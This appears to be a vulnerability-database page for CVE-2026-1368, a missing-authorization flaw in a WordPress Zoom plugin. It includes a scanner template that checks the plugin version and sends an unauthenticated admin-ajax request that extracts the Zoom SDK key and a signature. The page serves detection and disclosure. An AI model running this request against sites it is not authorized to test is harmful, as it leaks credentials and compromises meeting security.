/Vulnerability Library

Video Conferencing with Zoom API < 4.6.6 - Unauthenticated SDK Signature Generation

CVE-2026-1368
Verified

Description

Zoom WordPress plugin < 4.6.6 contains a broken authentication caused by disabled nonce verification in an AJAX handler, letting unauthenticated attackers generate valid Zoom SDK signatures and retrieve the Zoom SDK key.

Severity

High

CVSS Score

7.5

Exploit Probability

33%

Published Date

April 29, 2026

Template Author

0x_akoko

CVE-2026-1368.yaml
id: CVE-2026-1368

info:
  name: Video Conferencing with Zoom API < 4.6.6 - Unauthenticated SDK Signature Generation
  author: 0x_Akoko
  severity: high
  description: |
    Zoom WordPress plugin < 4.6.6 contains a broken authentication caused by disabled nonce verification in an AJAX handler, letting unauthenticated attackers generate valid Zoom SDK signatures and retrieve the Zoom SDK key.
  impact: |
    Unauthenticated attackers can generate valid SDK signatures and retrieve the Zoom SDK key, potentially compromising meeting security.
  remediation: |
    Update to version 4.6.6 or later.
  reference:
    - https://wpscan.com/vulnerability/218e6655-c5aa-4bce-86b2-cad3bb20020c/
    - https://wordpress.org/plugins/video-conferencing-with-zoom-api/
    - https://plugins.trac.wordpress.org/browser/video-conferencing-with-zoom-api/
  classification:
    cve-id: CVE-2026-1368
    epss-score: 0.32922
    epss-percentile: 0.96955
    cwe-id: CWE-862
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="/wp-content/plugins/video-conferencing-with-zoom-api/"
  tags: cve,cve2026,wordpress,wp-plugin,wp,zoom,vczapi,unauth,intrusive

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/video-conferencing-with-zoom-api/README.txt"

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - '(?i)Stable tag:\s*([\d.]+)'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Video Conferencing with Zoom")'
          - 'compare_versions(version, "<4.6.6")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=get_auth&meeting_id=123456789

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"success\":true", "\"sig\":\"eyJ", "\"type\":\"sdk\"")'
        condition: and

    extractors:
      - type: json
        name: sdk_key
        json:
          - '.data.key'

      - type: json
        name: sdk_signature
        json:
          - '.data.sig'
# digest: 4a0a00473045022027019a3acc25a337ca4b41f0f4f2fbb4e134550b6d34b76f980f0c2dc14833670221009d043b1d8894fac49227c8b5cfd16d47c5ea4ba3e6802ed86fb1b9baba328431:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-1368
CWE ID:
cwe-862

References

https://wpscan.com/vulnerability/218e6655-c5aa-4bce-86b2-cad3bb20020c/https://wordpress.org/plugins/video-conferencing-with-zoom-api/https://plugins.trac.wordpress.org/browser/video-conferencing-with-zoom-api/

Remediation Steps

Update to version 4.6.6 or later.